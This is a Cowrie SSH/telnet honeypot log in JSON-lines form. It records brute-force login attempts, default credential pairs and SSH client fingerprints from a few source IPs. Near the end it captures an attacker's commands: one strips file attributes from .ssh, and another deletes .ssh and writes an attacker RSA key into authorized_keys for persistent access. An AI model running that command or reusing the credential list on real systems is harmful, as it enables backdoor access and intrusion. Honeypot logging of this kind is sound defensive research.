"zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:27:07.468754Z","src_ip":"212.227.235.229","session":"af57b8ed9b90"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:27:08.775504Z","src_ip":"212.227.235.229","session":"af57b8ed9b90"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:27:10.094260Z","src_ip":"212.227.235.229","session":"af57b8ed9b90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36928,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f90123e6c0c","protocol":"ssh","message":"New connection: 212.227.235.229:36928 (1.2.3.4:22) [session: 1f90123e6c0c]","sensor":"my-vps","timestamp":"2025-09-08T23:27:10.402922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:27:10.403995Z","src_ip":"212.227.235.229","session":"1f90123e6c0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:27:10.712727Z","src_ip":"212.227.235.229","session":"1f90123e6c0c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:27:12.396215Z","src_ip":"212.227.235.229","session":"1f90123e6c0c"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:27:12.699598Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:27:12.706742Z","src_ip":"212.227.235.229","session":"1f90123e6c0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60394,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7b6327a8206","protocol":"ssh","message":"New connection: 212.227.235.229:60394 (1.2.3.4:22) [session: a7b6327a8206]","sensor":"my-vps","timestamp":"2025-09-08T23:27:21.875302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:27:21.877828Z","src_ip":"212.227.235.229","session":"a7b6327a8206"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:27:22.015444Z","src_ip":"212.227.235.229","session":"a7b6327a8206"}
{"eventid":"cowrie.login.failed","username":"superman","password":"superman@2025","message":"login attempt [superman/superman@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T23:27:22.557597Z","src_ip":"212.227.235.229","session":"a7b6327a8206"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:27:23.695146Z","src_ip":"212.227.235.229","session":"a7b6327a8206"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":41128,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc2a956687e0","protocol":"ssh","message":"New connection: 3.131.215.38:41128 (1.2.3.4:22) [session: cc2a956687e0]","sensor":"my-vps","timestamp":"2025-09-08T23:27:31.762107Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-08T23:27:31.763102Z","src_ip":"3.131.215.38","session":"cc2a956687e0"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:27:31.763790Z","src_ip":"3.131.215.38","session":"cc2a956687e0"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.117.116","src_port":33550,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e204d27a8fb","protocol":"ssh","message":"New connection: 14.103.117.116:33550 (1.2.3.4:22) [session: 9e204d27a8fb]","sensor":"my-vps","timestamp":"2025-09-08T23:28:03.233931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:03.235181Z","src_ip":"14.103.117.116","session":"9e204d27a8fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:28:03.428077Z","src_ip":"14.103.117.116","session":"9e204d27a8fb"}
{"eventid":"cowrie.login.success","username":"root","password":"Root123123","message":"login attempt [root/Root123123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:28:04.224347Z","src_ip":"14.103.117.116","session":"9e204d27a8fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38557,"dst_ip":"1.2.3.4","dst_port":23,"session":"51e84e5fc502","protocol":"telnet","message":"New connection: 212.227.235.229:38557 (1.2.3.4:23) [session: 51e84e5fc502]","sensor":"my-vps","timestamp":"2025-09-08T23:28:17.626265Z"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.117.116","src_port":45686,"dst_ip":"1.2.3.4","dst_port":22,"session":"403c8c7ed533","protocol":"ssh","message":"New connection: 14.103.117.116:45686 (1.2.3.4:22) [session: 403c8c7ed533]","sensor":"my-vps","timestamp":"2025-09-08T23:28:20.635906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:20.638342Z","src_ip":"14.103.117.116","session":"403c8c7ed533"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:28:20.825602Z","src_ip":"14.103.117.116","session":"403c8c7ed533"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:28:21.575642Z","src_ip":"14.103.117.116","session":"403c8c7ed533"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.117.116","src_port":42786,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c4c03b7426c","protocol":"ssh","message":"New connection: 14.103.117.116:42786 (1.2.3.4:22) [session: 0c4c03b7426c]","sensor":"my-vps","timestamp":"2025-09-08T23:28:29.781630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:29.784711Z","src_ip":"14.103.117.116","session":"0c4c03b7426c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:28:29.982069Z","src_ip":"14.103.117.116","session":"0c4c03b7426c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:28:30.771297Z","src_ip":"14.103.117.116","session":"0c4c03b7426c"}
{"eventid":"cowrie.session.closed","duration":13.288601160049438,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:30.914800Z","src_ip":"212.227.235.229","session":"51e84e5fc502"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:30.968945Z","src_ip":"14.103.117.116","session":"0c4c03b7426c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59322,"dst_ip":"1.2.3.4","dst_port":23,"session":"5d19ad8bd5a3","protocol":"telnet","message":"New connection: 212.227.235.229:59322 (1.2.3.4:23) [session: 5d19ad8bd5a3]","sensor":"my-vps","timestamp":"2025-09-08T23:28:31.380856Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:28:31.580264Z","src_ip":"212.227.235.229","session":"5d19ad8bd5a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:28:31.600430Z","src_ip":"212.227.235.229","session":"5d19ad8bd5a3"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T23:28:31.601755Z","src_ip":"212.227.235.229","session":"5d19ad8bd5a3"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T23:28:31.602594Z","src_ip":"212.227.235.229","session":"5d19ad8bd5a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53702,"dst_ip":"1.2.3.4","dst_port":22,"session":"684c2bb35a3e","protocol":"ssh","message":"New connection: 212.227.235.229:53702 (1.2.3.4:22) [session: 684c2bb35a3e]","sensor":"my-vps","timestamp":"2025-09-08T23:28:40.106057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:40.106892Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:28:40.240683Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40234,"dst_ip":"1.2.3.4","dst_port":22,"session":"93bf86607761","protocol":"ssh","message":"New connection: 212.227.235.229:40234 (1.2.3.4:22) [session: 93bf86607761]","sensor":"my-vps","timestamp":"2025-09-08T23:28:40.494828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:40.495473Z","src_ip":"212.227.235.229","session":"93bf86607761"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:28:40.804600Z","src_ip":"212.227.235.229","session":"93bf86607761"}
{"eventid":"cowrie.login.success","username":"root","password":"Zj123456","message":"login attempt [root/Zj123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:28:40.821943Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:28:41.150948Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:28:41.151618Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:28:41.152466Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:41.288354Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:28:41.630710Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:28:41.631414Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:28:41.772437Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:28:41.773357Z","src_ip":"212.227.235.229","session":"684c2bb35a3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53710,"dst_ip":"1.2.3.4","dst_port":22,"session":"4920bfb1dddb","protocol":"ssh","message":"New connection: 212.227.235.229:53710 (1.2.3.4:22) [session: 4920bfb1dddb]","sensor":"my-vps","timestamp":"2025-09-08T23:28:41.911691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:28:41.912497Z","src_ip":"212.227.235.229","session":"4920bfb1dddb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:28:42.050414Z","src_ip":"212.227.235.229","session":"4920bfb1dddb"}
{"eventid":"cowrie.login.success","username":"root","password":"juke2024","message":"login attempt [root/juke2024] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:28:42.079624Z","src_ip":"212.227.235.229","session":"93bf86607761"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:28:42.647332Z","src_ip":"212.227.235.229","session":"4920bfb1dddb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:28:42.943743Z","src_ip":"212.227.235.229","session":"93bf86607761"}
